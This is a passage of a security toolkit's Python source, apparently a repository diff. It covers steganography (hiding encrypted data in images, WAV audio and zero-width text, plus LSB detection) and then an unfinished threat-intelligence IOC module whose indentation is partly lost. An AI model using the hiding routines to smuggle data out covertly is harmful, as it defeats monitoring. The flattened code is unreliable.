        except Exception as e:
            return {'ok': False, 'error': str(e)}
    @staticmethod
    def hide(image_path: str, data: bytes, output_path: str,
             password: str = None, bits_per_channel: int = 1) -> Dict:
        """Hide data in image using LSB encoding.

        Fix: previously ``bits_per_channel > 1`` cleared N low bits per
        channel but embedded only one payload bit, while the capacity check
        assumed N bits/channel — silently truncating larger payloads. Now N
        payload bits are packed MSB-first into each channel, matching
        ``extract`` called with the same ``bits_per_channel``. The default
        of 1 stays byte-compatible with previously generated files.
        """
        if not HAS_PIL:
            return {'ok': False, 'error': 'Pillow (PIL) not installed'}
        try:
            img = Image.open(image_path).convert('RGB')
            pixels = list(img.getdata())
            w, h = img.size
            # Encrypt if password provided
            payload = data
            if password:
                payload = _encrypt_data(data, password)
            # Build header: magic(4) + length(4) + payload
            header = ImageStego.MAGIC + struct.pack('>I', len(payload))
            full_data = header + payload
            # Convert to a flat bit stream, MSB first within each byte
            bits = []
            for byte in full_data:
                for i in range(7, -1, -1):
                    bits.append((byte >> i) & 1)
            # Check capacity (bits_per_channel payload bits per channel)
            max_bits = len(pixels) * 3 * bits_per_channel
            if len(bits) > max_bits:
                return {'ok': False, 'error': f'Data too large ({len(full_data)} bytes). '
                                              f'Max capacity: {max_bits // 8} bytes'}
            # Encode bits into the low bits_per_channel bits of each channel
            mask = ~((1 << bits_per_channel) - 1) & 0xFF
            total_bits = len(bits)
            bit_idx = 0
            new_pixels = []
            for pixel in pixels:
                new_pixel = []
                for channel_val in pixel:
                    if bit_idx < total_bits:
                        # Pack up to bits_per_channel payload bits, MSB-first;
                        # a partial final chunk is zero-padded at the low end.
                        chunk = 0
                        for _ in range(bits_per_channel):
                            chunk <<= 1
                            if bit_idx < total_bits:
                                chunk |= bits[bit_idx]
                                bit_idx += 1
                        new_pixel.append((channel_val & mask) | chunk)
                    else:
                        new_pixel.append(channel_val)
                new_pixels.append(tuple(new_pixel))
            # Save losslessly — JPEG would destroy the LSB payload
            stego_img = Image.new('RGB', (w, h))
            stego_img.putdata(new_pixels)
            stego_img.save(output_path, 'PNG')
            return {
                'ok': True,
                'output': output_path,
                'hidden_bytes': len(payload),
                'encrypted': password is not None,
                'message': f'Hidden {len(payload)} bytes in {output_path}'
            }
        except Exception as e:
            return {'ok': False, 'error': str(e)}
    @staticmethod
    def extract(image_path: str, password: str = None,
                bits_per_channel: int = 1) -> Dict:
        """Extract hidden data from image.

        Must be called with the same ``bits_per_channel`` used by ``hide``.
        """
        if not HAS_PIL:
            return {'ok': False, 'error': 'Pillow (PIL) not installed'}
        try:
            img = Image.open(image_path).convert('RGB')
            pixels = list(img.getdata())
            # Read the low bits_per_channel bits of every channel, MSB-first,
            # mirroring the packing order used by hide().
            low_mask = (1 << bits_per_channel) - 1
            bits = []
            for pixel in pixels:
                for channel_val in pixel:
                    chunk = channel_val & low_mask
                    for shift in range(bits_per_channel - 1, -1, -1):
                        bits.append((chunk >> shift) & 1)
            # Convert bits to bytes
            all_bytes = bytearray()
            for i in range(0, len(bits) - 7, 8):
                byte = 0
                for j in range(8):
                    byte = (byte << 1) | bits[i + j]
                all_bytes.append(byte)
            # Check magic
            if all_bytes[:4] != ImageStego.MAGIC:
                return {'ok': False, 'error': 'No hidden data found (magic mismatch)'}
            # Read length
            payload_len = struct.unpack('>I', bytes(all_bytes[4:8]))[0]
            if payload_len > len(all_bytes) - 8:
                return {'ok': False, 'error': 'Corrupted data (length exceeds image capacity)'}
            payload = bytes(all_bytes[8:8 + payload_len])
            # Decrypt if password provided
            if password:
                try:
                    payload = _decrypt_data(payload, password)
                except Exception:
                    return {'ok': False, 'error': 'Decryption failed (wrong password?)'}
            return {
                'ok': True,
                'data': payload,
                'size': len(payload),
                'encrypted': password is not None,
                'message': f'Extracted {len(payload)} bytes'
            }
        except Exception as e:
            return {'ok': False, 'error': str(e)}
# ── Audio Steganography ──────────────────────────────────────────────────────
class AudioStego:
    """LSB steganography for WAV audio files.

    The payload (magic + 32-bit length + data) is written into the least
    significant bit of every raw frame byte.
    """
    # Same signature as ImageStego so detectors can recognize both.
    MAGIC = b'ASTS'
    @staticmethod
    def capacity(audio_path: str) -> Dict:
        """Calculate maximum payload capacity.

        NOTE(review): this computes frames*channels bits, but hide() embeds
        one bit per raw frame *byte* (frames*channels*sample_width bits), so
        for 16-bit audio this under-reports by the sample width — confirm
        which is intended.
        """
        if not HAS_WAVE:
            return {'ok': False, 'error': 'wave module not available'}
        try:
            with wave.open(audio_path, 'rb') as w:
                frames = w.getnframes()
                channels = w.getnchannels()
                sample_width = w.getsampwidth()
                total_bytes = (frames * channels) // 8 - 8
                return {
                    'ok': True, 'capacity_bytes': max(0, total_bytes),
                    'frames': frames, 'channels': channels,
                    'sample_width': sample_width,
                    'framerate': w.getframerate()
                }
        except Exception as e:
            return {'ok': False, 'error': str(e)}
    @staticmethod
    def hide(audio_path: str, data: bytes, output_path: str,
             password: str = None) -> Dict:
        """Hide data in WAV audio using LSB of samples.

        Args:
            audio_path: Source WAV file.
            data: Payload bytes to embed.
            output_path: Destination WAV file (same params as source).
            password: Optional AES passphrase.

        Returns:
            Result dict with 'ok' and either output details or 'error'.
        """
        if not HAS_WAVE:
            return {'ok': False, 'error': 'wave module not available'}
        try:
            with wave.open(audio_path, 'rb') as w:
                params = w.getparams()
                frames = w.readframes(w.getnframes())
            payload = data
            if password:
                payload = _encrypt_data(data, password)
            # Header: magic(4) + big-endian payload length(4)
            header = AudioStego.MAGIC + struct.pack('>I', len(payload))
            full_data = header + payload
            bits = []
            for byte in full_data:
                for i in range(7, -1, -1):
                    bits.append((byte >> i) & 1)
            # One payload bit per raw frame byte (not per sample).
            samples = list(frames)
            if len(bits) > len(samples):
                return {'ok': False, 'error': f'Data too large. Max: {len(samples) // 8} bytes'}
            for i, bit in enumerate(bits):
                samples[i] = (samples[i] & 0xFE) | bit
            with wave.open(output_path, 'wb') as w:
                w.setparams(params)
                w.writeframes(bytes(samples))
            return {
                'ok': True, 'output': output_path,
                'hidden_bytes': len(payload),
                'encrypted': password is not None
            }
        except Exception as e:
            return {'ok': False, 'error': str(e)}
    @staticmethod
    def extract(audio_path: str, password: str = None) -> Dict:
        """Extract hidden data from WAV audio.

        Reads the LSB of every raw frame byte, validates the magic header,
        then slices out the declared payload length.
        """
        if not HAS_WAVE:
            return {'ok': False, 'error': 'wave module not available'}
        try:
            with wave.open(audio_path, 'rb') as w:
                frames = w.readframes(w.getnframes())
            samples = list(frames)
            bits = [s & 1 for s in samples]
            all_bytes = bytearray()
            for i in range(0, len(bits) - 7, 8):
                byte = 0
                for j in range(8):
                    byte = (byte << 1) | bits[i + j]
                all_bytes.append(byte)
            if all_bytes[:4] != AudioStego.MAGIC:
                return {'ok': False, 'error': 'No hidden data found'}
            payload_len = struct.unpack('>I', bytes(all_bytes[4:8]))[0]
            payload = bytes(all_bytes[8:8 + payload_len])
            if password:
                try:
                    payload = _decrypt_data(payload, password)
                except Exception:
                    return {'ok': False, 'error': 'Decryption failed'}
            return {'ok': True, 'data': payload, 'size': len(payload)}
        except Exception as e:
            return {'ok': False, 'error': str(e)}
# ── Document Steganography ───────────────────────────────────────────────────
class DocumentStego:
    """Whitespace and metadata steganography for text/documents.

    Encoding: a 32-bit big-endian payload length, a zero-width-joiner
    separator, then the payload bits — all rendered as zero-width
    characters spliced invisibly into the carrier text.
    """
    @staticmethod
    def hide_whitespace(text: str, data: bytes, password: str = None) -> Dict:
        """Hide data using zero-width characters in text.

        Args:
            text: Carrier text; hidden chars are inserted after its first line.
            data: Payload bytes.
            password: Optional AES passphrase.

        Returns:
            Dict with 'ok', 'text' (carrier with payload), 'hidden_bytes',
            'encrypted'.
        """
        payload = data
        if password:
            payload = _encrypt_data(data, password)
        # Zero-width characters
        ZWS = '\u200b'   # zero-width space → 0
        ZWNJ = '\u200c'  # zero-width non-joiner → 1
        ZWJ = '\u200d'   # zero-width joiner → separator
        def _to_zw(bitstring: str) -> str:
            # str.join instead of += in a loop (quadratic concatenation fix)
            return ''.join(ZWNJ if bit == '1' else ZWS for bit in bitstring)
        # Payload bits, then a 32-bit length prefix, joined by the separator
        encoded = _to_zw(''.join(f'{byte:08b}' for byte in payload))
        length_encoded = _to_zw(f'{len(payload):032b}')
        hidden = length_encoded + ZWJ + encoded
        # Insert after first line
        lines = text.split('\n', 1)
        if len(lines) > 1:
            result = lines[0] + hidden + '\n' + lines[1]
        else:
            result = text + hidden
        return {
            'ok': True, 'text': result,
            'hidden_bytes': len(payload),
            'encrypted': password is not None
        }
    @staticmethod
    def extract_whitespace(text: str, password: str = None) -> Dict:
        """Extract data hidden in zero-width characters.

        Returns:
            Dict with 'ok' and 'data'/'size' on success, or 'error'.
        """
        ZWS = '\u200b'
        ZWNJ = '\u200c'
        ZWJ = '\u200d'
        # Collect only the zero-width characters, ignoring visible text
        zw_chars = ''.join(c for c in text if c in (ZWS, ZWNJ, ZWJ))
        if ZWJ not in zw_chars:
            return {'ok': False, 'error': 'No hidden data found'}
        length_part, data_part = zw_chars.split(ZWJ, 1)
        # Decode 32-bit length header
        length_bits = ''.join('1' if c == ZWNJ else '0' for c in length_part)
        if len(length_bits) < 32:
            return {'ok': False, 'error': 'Corrupted header'}
        payload_len = int(length_bits[:32], 2)
        # Decode payload bytes, stopping at the declared length
        data_bits = ''.join('1' if c == ZWNJ else '0' for c in data_part)
        payload = bytearray()
        for i in range(0, min(len(data_bits), payload_len * 8), 8):
            if i + 8 <= len(data_bits):
                payload.append(int(data_bits[i:i+8], 2))
        result_data = bytes(payload)
        if password:
            try:
                result_data = _decrypt_data(result_data, password)
            except Exception:
                return {'ok': False, 'error': 'Decryption failed'}
        return {'ok': True, 'data': result_data, 'size': len(result_data)}
# ── Detection / Analysis ────────────────────────────────────────────────────
class StegoDetector:
    """Statistical analysis to detect hidden data in files.

    Combines a chi-square uniformity test on LSBs, a simplified RS
    (Regular/Singular) pair analysis, and a direct check for the AUTARCH
    'ASTS' magic bytes.
    """
    @staticmethod
    def analyze_image(image_path: str) -> Dict:
        """Analyze image for signs of steganography.

        Returns:
            Dict with 'verdict' ('clean'/'suspicious'/'likely_stego'),
            a 0-100 'confidence_score', the raw statistics, and the list
            of triggered 'indicators'.
        """
        if not HAS_PIL:
            return {'ok': False, 'error': 'Pillow (PIL) not installed'}
        try:
            img = Image.open(image_path).convert('RGB')
            pixels = list(img.getdata())
            w, h = img.size
            # Chi-square analysis on LSBs
            observed = [0, 0]  # count of 0s and 1s in R channel LSBs
            for pixel in pixels:
                observed[pixel[0] & 1] += 1
            total = sum(observed)
            expected = total / 2
            chi_sq = sum((o - expected) ** 2 / expected for o in observed)
            # RS analysis (Regular-Singular groups)
            # Count pixel pairs where LSB flip changes smoothness
            regular = 0
            singular = 0
            for i in range(0, len(pixels) - 1, 2):
                p1, p2 = pixels[i][0], pixels[i+1][0]
                diff_orig = abs(p1 - p2)
                diff_flip = abs((p1 ^ 1) - p2)
                if diff_flip > diff_orig:
                    regular += 1
                elif diff_flip < diff_orig:
                    singular += 1
            total_pairs = regular + singular
            # 0.5 fallback = "no evidence either way" when no pairs differ
            rs_ratio = regular / total_pairs if total_pairs > 0 else 0.5
            # Check for ASTS magic in LSBs (first ~100 pixels suffice for
            # the 4-byte header)
            bits = []
            for pixel in pixels[:100]:
                for c in pixel:
                    bits.append(c & 1)
            header_bytes = bytearray()
            for i in range(0, min(32, len(bits)), 8):
                byte = 0
                for j in range(8):
                    byte = (byte << 1) | bits[i + j]
                header_bytes.append(byte)
            has_asts_magic = header_bytes[:4] == ImageStego.MAGIC
            # Scoring: each indicator adds to a 0-100 confidence score
            score = 0
            indicators = []
            # 3.84 is the chi-square critical value at p=0.05, 1 dof
            if chi_sq < 1.0:
                score += 30
                indicators.append(f'LSB distribution very uniform (chi²={chi_sq:.2f})')
            elif chi_sq < 3.84:
                score += 15
                indicators.append(f'LSB distribution slightly uniform (chi²={chi_sq:.2f})')
            if rs_ratio > 0.6:
                score += 25
                indicators.append(f'RS analysis suggests embedding (R/S={rs_ratio:.3f})')
            if has_asts_magic:
                score += 50
                indicators.append('AUTARCH stego signature detected in LSB')
            # Check file size vs expected
            file_size = os.path.getsize(image_path)
            expected_size = w * h * 3  # rough uncompressed estimate
            if file_size > expected_size * 0.9:  # PNG should be smaller
                score += 10
                indicators.append('File larger than expected for format')
            verdict = 'clean'
            if score >= 50:
                verdict = 'likely_stego'
            elif score >= 25:
                verdict = 'suspicious'
            return {
                'ok': True,
                'verdict': verdict,
                'confidence_score': min(100, score),
                'chi_square': round(chi_sq, 4),
                'rs_ratio': round(rs_ratio, 4),
                'has_magic': has_asts_magic,
                'indicators': indicators,
                'image_info': {'width': w, 'height': h, 'size': file_size}
            }
        except Exception as e:
            return {'ok': False, 'error': str(e)}
    @staticmethod
    def analyze_audio(audio_path: str) -> Dict:
        """Analyze audio file for signs of steganography.

        Same chi-square + magic-bytes approach as analyze_image, applied to
        the LSBs of at most the first 100k raw frame bytes.
        """
        if not HAS_WAVE:
            return {'ok': False, 'error': 'wave module not available'}
        try:
            with wave.open(audio_path, 'rb') as w:
                frames = w.readframes(min(w.getnframes(), 100000))
                params = w.getparams()
            samples = list(frames)
            observed = [0, 0]
            for s in samples:
                observed[s & 1] += 1
            total = sum(observed)
            expected = total / 2
            chi_sq = sum((o - expected) ** 2 / expected for o in observed)
            # Check for magic in the first 100 LSBs
            bits = [s & 1 for s in samples[:100]]
            header_bytes = bytearray()
            for i in range(0, min(32, len(bits)), 8):
                byte = 0
                for j in range(8):
                    byte = (byte << 1) | bits[i + j]
                header_bytes.append(byte)
            has_magic = header_bytes[:4] == AudioStego.MAGIC
            score = 0
            indicators = []
            if chi_sq < 1.0:
                score += 30
                indicators.append(f'LSB distribution uniform (chi²={chi_sq:.2f})')
            if has_magic:
                score += 50
                indicators.append('AUTARCH stego signature detected')
            verdict = 'clean'
            if score >= 50:
                verdict = 'likely_stego'
            elif score >= 25:
                verdict = 'suspicious'
            return {
                'ok': True, 'verdict': verdict,
                'confidence_score': min(100, score),
                'chi_square': round(chi_sq, 4),
                'has_magic': has_magic,
                'indicators': indicators,
                'audio_info': {
                    'channels': params.nchannels,
                    'framerate': params.framerate,
                    'frames': params.nframes
                }
            }
        except Exception as e:
            return {'ok': False, 'error': str(e)}
# ── Steganography Manager ───────────────────────────────────────────────────
class StegoManager:
    """Unified interface for all steganography operations.

    Dispatches hide/extract/detect/capacity calls to the image, audio or
    document backends, inferring the carrier type from the file extension
    when it is not given explicitly.
    """

    # Extensions handled by each backend.
    _IMAGE_EXTS = ('.png', '.bmp', '.tiff', '.tif')
    _AUDIO_EXTS = ('.wav', '.wave')

    def __init__(self):
        self.data_dir = os.path.join(get_data_dir(), 'stego')
        os.makedirs(self.data_dir, exist_ok=True)
        self.image = ImageStego()
        self.audio = AudioStego()
        self.document = DocumentStego()
        self.detector = StegoDetector()

    def get_capabilities(self) -> Dict:
        """Check available steganography capabilities."""
        return {
            'image': HAS_PIL,
            'audio': HAS_WAVE,
            'document': True,
            'encryption': HAS_CRYPTO,
            'detection': HAS_PIL or HAS_WAVE
        }

    def _classify(self, path: str) -> Optional[str]:
        """Map a file extension to a carrier type, or None if unsupported."""
        ext = Path(path).suffix.lower()
        if ext in self._IMAGE_EXTS:
            return 'image'
        if ext in self._AUDIO_EXTS:
            return 'audio'
        return None

    def hide(self, carrier_path: str, data: bytes, output_path: str = None,
             password: str = None, carrier_type: str = None) -> Dict:
        """Hide data in a carrier file (auto-detect type from extension)."""
        if not carrier_type:
            carrier_type = self._classify(carrier_path)
            if carrier_type is None:
                ext = Path(carrier_path).suffix.lower()
                return {'ok': False, 'error': f'Unsupported carrier format: {ext}'}
        if not output_path:
            src = Path(carrier_path)
            output_path = str(src.parent / f'{src.stem}_stego{src.suffix}')
        if carrier_type == 'image':
            return self.image.hide(carrier_path, data, output_path, password)
        if carrier_type == 'audio':
            return self.audio.hide(carrier_path, data, output_path, password)
        return {'ok': False, 'error': f'Unsupported type: {carrier_type}'}

    def extract(self, carrier_path: str, password: str = None,
                carrier_type: str = None) -> Dict:
        """Extract hidden data from carrier file."""
        if not carrier_type:
            carrier_type = self._classify(carrier_path)
        if carrier_type == 'image':
            return self.image.extract(carrier_path, password)
        if carrier_type == 'audio':
            return self.audio.extract(carrier_path, password)
        return {'ok': False, 'error': f'Unsupported type: {carrier_type}'}

    def detect(self, file_path: str) -> Dict:
        """Analyze file for steganographic content."""
        ext = Path(file_path).suffix.lower()
        # JPEG can be analyzed (not hidden into: lossy compression).
        if ext in ('.png', '.bmp', '.tiff', '.tif', '.jpg', '.jpeg'):
            return self.detector.analyze_image(file_path)
        if ext in self._AUDIO_EXTS:
            return self.detector.analyze_audio(file_path)
        return {'ok': False, 'error': f'Unsupported format for detection: {ext}'}

    def capacity(self, file_path: str) -> Dict:
        """Check payload capacity of a carrier file."""
        ext = Path(file_path).suffix.lower()
        if ext in self._IMAGE_EXTS:
            return self.image.capacity(file_path)
        if ext in self._AUDIO_EXTS:
            return self.audio.capacity(file_path)
        return {'ok': False, 'error': f'Unsupported format: {ext}'}
# ── Singleton ────────────────────────────────────────────────────────────────
# Lazily-created module-level singleton.
_instance = None
def get_stego_manager() -> StegoManager:
    """Return the shared StegoManager instance, creating it on first use."""
    global _instance
    if _instance is None:
        _instance = StegoManager()
    return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
    """CLI entry point for Steganography module.

    Interactive menu loop: hide/extract data in image or audio carriers,
    run stego detection, check carrier capacity, and embed/extract text
    via whitespace encoding in documents. Loops until '0' is entered.
    """
    mgr = get_stego_manager()
    while True:
        # Capabilities depend on optional libraries (Pillow, pycryptodome).
        caps = mgr.get_capabilities()
        print(f"\n{'='*60}")
        print(f" Steganography")
        print(f"{'='*60}")
        print(f" Image: {'OK' if caps['image'] else 'MISSING (pip install Pillow)'}")
        print(f" Audio: {'OK' if caps['audio'] else 'MISSING'}")
        print(f" Encryption: {'OK' if caps['encryption'] else 'MISSING (pip install pycryptodome)'}")
        print()
        print(" 1 — Hide Data in File")
        print(" 2 — Extract Data from File")
        print(" 3 — Detect Steganography")
        print(" 4 — Check Carrier Capacity")
        print(" 5 — Hide Text in Document (whitespace)")
        print(" 6 — Extract Text from Document")
        print(" 0 — Back")
        print()
        choice = input(" > ").strip()
        if choice == '0':
            break
        elif choice == '1':
            # Hide a text message in an image/audio carrier.
            carrier = input(" Carrier file path: ").strip()
            message = input(" Message to hide: ").strip()
            output = input(" Output file path (blank=auto): ").strip() or None
            password = input(" Encryption password (blank=none): ").strip() or None
            if carrier and message:
                result = mgr.hide(carrier, message.encode(), output, password)
                if result['ok']:
                    print(f" Success: {result.get('message', result.get('output'))}")
                else:
                    print(f" Error: {result['error']}")
        elif choice == '2':
            # Extract hidden payload; falls back to a size-only report
            # when the payload is not valid UTF-8.
            carrier = input(" Stego file path: ").strip()
            password = input(" Password (blank=none): ").strip() or None
            if carrier:
                result = mgr.extract(carrier, password)
                if result['ok']:
                    try:
                        text = result['data'].decode('utf-8')
                        print(f" Extracted ({result['size']} bytes): {text}")
                    except UnicodeDecodeError:
                        print(f" Extracted {result['size']} bytes (binary data)")
                else:
                    print(f" Error: {result['error']}")
        elif choice == '3':
            # Heuristic stego detection with a verdict and indicator list.
            filepath = input(" File to analyze: ").strip()
            if filepath:
                result = mgr.detect(filepath)
                if result['ok']:
                    print(f" Verdict: {result['verdict']} (score: {result['confidence_score']})")
                    for ind in result.get('indicators', []):
                        print(f" - {ind}")
                else:
                    print(f" Error: {result['error']}")
        elif choice == '4':
            filepath = input(" Carrier file: ").strip()
            if filepath:
                result = mgr.capacity(filepath)
                if result['ok']:
                    kb = result['capacity_bytes'] / 1024
                    print(f" Capacity: {result['capacity_bytes']} bytes ({kb:.1f} KB)")
                else:
                    print(f" Error: {result['error']}")
        elif choice == '5':
            # Whitespace steganography: output text carries the message.
            text = input(" Cover text: ").strip()
            message = input(" Hidden message: ").strip()
            password = input(" Password (blank=none): ").strip() or None
            if text and message:
                result = mgr.document.hide_whitespace(text, message.encode(), password)
                if result['ok']:
                    print(f" Output text (copy this):")
                    print(f" {result['text']}")
                else:
                    print(f" Error: {result['error']}")
        elif choice == '6':
            text = input(" Text with hidden data: ").strip()
            password = input(" Password (blank=none): ").strip() or None
            if text:
                result = mgr.document.extract_whitespace(text, password)
                if result['ok']:
                    print(f" Hidden message: {result['data'].decode('utf-8', errors='replace')}")
                else:
                    print(f" Error: {result['error']}")

716
modules/threat_intel.py Normal file
View File

@@ -0,0 +1,716 @@
"""AUTARCH Threat Intelligence Feed
IOC management, feed ingestion (STIX/TAXII, CSV, JSON), correlation with
OSINT dossiers, reputation lookups, alerting, and blocklist generation.
"""
DESCRIPTION = "Threat intelligence & IOC management"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "defense"
import os
import re
import json
import time
import hashlib
import threading
from pathlib import Path
from datetime import datetime, timezone
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any, Set
from urllib.parse import urlparse
try:
from core.paths import get_data_dir
except ImportError:
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
try:
import requests
except ImportError:
requests = None
# ── Data Structures ──────────────────────────────────────────────────────────
# Supported IOC categories; bulk_import validates the optional "type" CSV
# column against this list and detect_ioc_type returns one of these (or
# 'unknown').
IOC_TYPES = ['ip', 'domain', 'url', 'hash_md5', 'hash_sha1', 'hash_sha256', 'email', 'filename']
@dataclass
class IOC:
    # A single indicator of compromise plus its bookkeeping metadata.
    value: str
    ioc_type: str
    source: str = "manual"
    tags: List[str] = field(default_factory=list)
    severity: str = "unknown"  # critical, high, medium, low, info, unknown
    first_seen: str = ""
    last_seen: str = ""
    description: str = ""
    reference: str = ""
    active: bool = True

    def to_dict(self) -> Dict:
        """Serialize to a plain dict, adding a stable 12-char 'id' key.

        The id is derived from (ioc_type, value) so it never changes for
        the same indicator.
        """
        payload = {
            'value': self.value,
            'ioc_type': self.ioc_type,
            'source': self.source,
            'tags': self.tags,
            'severity': self.severity,
            'first_seen': self.first_seen,
            'last_seen': self.last_seen,
            'description': self.description,
            'reference': self.reference,
            'active': self.active,
        }
        digest = hashlib.md5(f"{self.ioc_type}:{self.value}".encode()).hexdigest()
        payload['id'] = digest[:12]
        return payload

    @staticmethod
    def from_dict(d: Dict) -> 'IOC':
        """Rebuild an IOC from a dict produced by to_dict (extra keys ignored)."""
        return IOC(
            value=d['value'],
            ioc_type=d['ioc_type'],
            source=d.get('source', 'manual'),
            tags=d.get('tags', []),
            severity=d.get('severity', 'unknown'),
            first_seen=d.get('first_seen', ''),
            last_seen=d.get('last_seen', ''),
            description=d.get('description', ''),
            reference=d.get('reference', ''),
            active=d.get('active', True),
        )
@dataclass
class Feed:
    # One configured external threat-intelligence source.
    name: str
    feed_type: str  # taxii, csv_url, json_url, stix_file
    url: str = ""
    api_key: str = ""
    enabled: bool = True
    last_fetch: str = ""
    ioc_count: int = 0
    interval_hours: int = 24

    def to_dict(self) -> Dict:
        """Serialize to a plain dict, adding a stable 12-char 'id' key.

        Note: 'id' is computed from (name, url) and is NOT a dataclass field.
        """
        payload = {
            'name': self.name,
            'feed_type': self.feed_type,
            'url': self.url,
            'api_key': self.api_key,
            'enabled': self.enabled,
            'last_fetch': self.last_fetch,
            'ioc_count': self.ioc_count,
            'interval_hours': self.interval_hours,
        }
        payload['id'] = hashlib.md5(f"{self.name}:{self.url}".encode()).hexdigest()[:12]
        return payload
# ── Threat Intel Engine ──────────────────────────────────────────────────────
class ThreatIntelEngine:
"""IOC management and threat intelligence correlation."""
    def __init__(self):
        """Create the engine and load any persisted IOCs/feeds from disk."""
        # Persistent store lives under <data>/threat_intel (iocs.json, feeds.json).
        self.data_dir = os.path.join(get_data_dir(), 'threat_intel')
        os.makedirs(self.data_dir, exist_ok=True)
        self.iocs: List[IOC] = []
        self.feeds: List[Feed] = []
        self.alerts: List[Dict] = []  # in-memory only; never persisted
        self._lock = threading.Lock()  # guards mutation of self.iocs
        self._load()
def _load(self):
"""Load IOCs and feeds from disk."""
ioc_file = os.path.join(self.data_dir, 'iocs.json')
if os.path.exists(ioc_file):
try:
with open(ioc_file) as f:
data = json.load(f)
self.iocs = [IOC.from_dict(d) for d in data]
except Exception:
pass
feed_file = os.path.join(self.data_dir, 'feeds.json')
if os.path.exists(feed_file):
try:
with open(feed_file) as f:
data = json.load(f)
self.feeds = [Feed(**d) for d in data]
except Exception:
pass
def _save_iocs(self):
"""Persist IOCs to disk."""
ioc_file = os.path.join(self.data_dir, 'iocs.json')
with open(ioc_file, 'w') as f:
json.dump([ioc.to_dict() for ioc in self.iocs], f, indent=2)
def _save_feeds(self):
"""Persist feeds to disk."""
feed_file = os.path.join(self.data_dir, 'feeds.json')
with open(feed_file, 'w') as f:
json.dump([feed.to_dict() for feed in self.feeds], f, indent=2)
# ── IOC Type Detection ───────────────────────────────────────────────
def detect_ioc_type(self, value: str) -> str:
"""Auto-detect IOC type from value."""
value = value.strip()
# Hash detection
if re.match(r'^[a-fA-F0-9]{32}$', value):
return 'hash_md5'
if re.match(r'^[a-fA-F0-9]{40}$', value):
return 'hash_sha1'
if re.match(r'^[a-fA-F0-9]{64}$', value):
return 'hash_sha256'
# URL
if re.match(r'^https?://', value, re.I):
return 'url'
# Email
if re.match(r'^[^@]+@[^@]+\.[^@]+$', value):
return 'email'
# IP (v4)
if re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', value):
return 'ip'
# Domain
if re.match(r'^[a-zA-Z0-9]([a-zA-Z0-9\-]*[a-zA-Z0-9])?(\.[a-zA-Z0-9]([a-zA-Z0-9\-]*[a-zA-Z0-9])?)*\.[a-zA-Z]{2,}$', value):
return 'domain'
# Filename
if '.' in value and '/' not in value and '\\' not in value:
return 'filename'
return 'unknown'
# ── IOC CRUD ─────────────────────────────────────────────────────────
    def add_ioc(self, value: str, ioc_type: str = None, source: str = "manual",
                tags: List[str] = None, severity: str = "unknown",
                description: str = "", reference: str = "") -> Dict:
        """Add a single IOC, or refresh it when (value, ioc_type) already exists.

        On a duplicate, last_seen is updated and any new tags are merged
        (deduplicated); action is 'updated'. Otherwise a new IOC is created
        with first_seen == last_seen == now; action is 'created'. The store
        is saved to disk either way.
        """
        if not ioc_type:
            ioc_type = self.detect_ioc_type(value)
        now = datetime.now(timezone.utc).isoformat()
        # Check for duplicate
        with self._lock:
            for existing in self.iocs:
                if existing.value == value and existing.ioc_type == ioc_type:
                    existing.last_seen = now
                    if tags:
                        # set() dedupes but does not preserve tag order
                        existing.tags = list(set(existing.tags + tags))
                    self._save_iocs()
                    return {'ok': True, 'action': 'updated', 'ioc': existing.to_dict()}
            ioc = IOC(
                value=value, ioc_type=ioc_type, source=source,
                tags=tags or [], severity=severity,
                first_seen=now, last_seen=now,
                description=description, reference=reference
            )
            self.iocs.append(ioc)
            self._save_iocs()
            return {'ok': True, 'action': 'created', 'ioc': ioc.to_dict()}
def remove_ioc(self, ioc_id: str) -> Dict:
"""Remove IOC by ID."""
with self._lock:
before = len(self.iocs)
self.iocs = [
ioc for ioc in self.iocs
if hashlib.md5(f"{ioc.ioc_type}:{ioc.value}".encode()).hexdigest()[:12] != ioc_id
]
if len(self.iocs) < before:
self._save_iocs()
return {'ok': True}
return {'ok': False, 'error': 'IOC not found'}
def get_iocs(self, ioc_type: str = None, source: str = None,
severity: str = None, search: str = None,
active_only: bool = True) -> List[Dict]:
"""Query IOCs with filters."""
results = []
for ioc in self.iocs:
if active_only and not ioc.active:
continue
if ioc_type and ioc.ioc_type != ioc_type:
continue
if source and ioc.source != source:
continue
if severity and ioc.severity != severity:
continue
if search and search.lower() not in ioc.value.lower() and \
search.lower() not in ioc.description.lower() and \
not any(search.lower() in t.lower() for t in ioc.tags):
continue
results.append(ioc.to_dict())
return results
def bulk_import(self, text: str, source: str = "import",
ioc_type: str = None) -> Dict:
"""Import IOCs from newline-separated text."""
imported = 0
skipped = 0
for line in text.strip().splitlines():
line = line.strip()
if not line or line.startswith('#'):
continue
# Handle CSV-style (value,type,severity,description)
parts = [p.strip() for p in line.split(',')]
value = parts[0]
t = parts[1] if len(parts) > 1 and parts[1] in IOC_TYPES else ioc_type
sev = parts[2] if len(parts) > 2 else 'unknown'
desc = parts[3] if len(parts) > 3 else ''
if not value:
skipped += 1
continue
result = self.add_ioc(value=value, ioc_type=t, source=source,
severity=sev, description=desc)
if result['ok']:
imported += 1
else:
skipped += 1
return {'ok': True, 'imported': imported, 'skipped': skipped}
    def export_iocs(self, fmt: str = 'json', ioc_type: str = None) -> str:
        """Export IOCs in the given format.

        fmt: 'json' (default), 'csv', or 'stix' (basic STIX 2.1 bundle).
        Inactive IOCs are included; *ioc_type* optionally restricts the set.
        Returns the serialized text; the caller writes it to disk.
        """
        iocs = self.get_iocs(ioc_type=ioc_type, active_only=False)
        if fmt == 'csv':
            lines = ['value,type,severity,source,tags,description']
            for ioc in iocs:
                # NOTE(review): fields are not CSV-escaped; a description
                # containing a comma will shift columns — confirm consumers.
                tags = ';'.join(ioc.get('tags', []))
                lines.append(f"{ioc['value']},{ioc['ioc_type']},{ioc['severity']},"
                             f"{ioc['source']},{tags},{ioc.get('description', '')}")
            return '\n'.join(lines)
        elif fmt == 'stix':
            # Basic STIX 2.1 bundle
            objects = []
            for ioc in iocs:
                # Map internal type names to STIX cyber-observable types.
                stix_type = {
                    'ip': 'ipv4-addr', 'domain': 'domain-name',
                    'url': 'url', 'email': 'email-addr',
                    'hash_md5': 'file', 'hash_sha1': 'file', 'hash_sha256': 'file',
                    'filename': 'file'
                }.get(ioc['ioc_type'], 'artifact')
                if stix_type == 'file' and ioc['ioc_type'].startswith('hash_'):
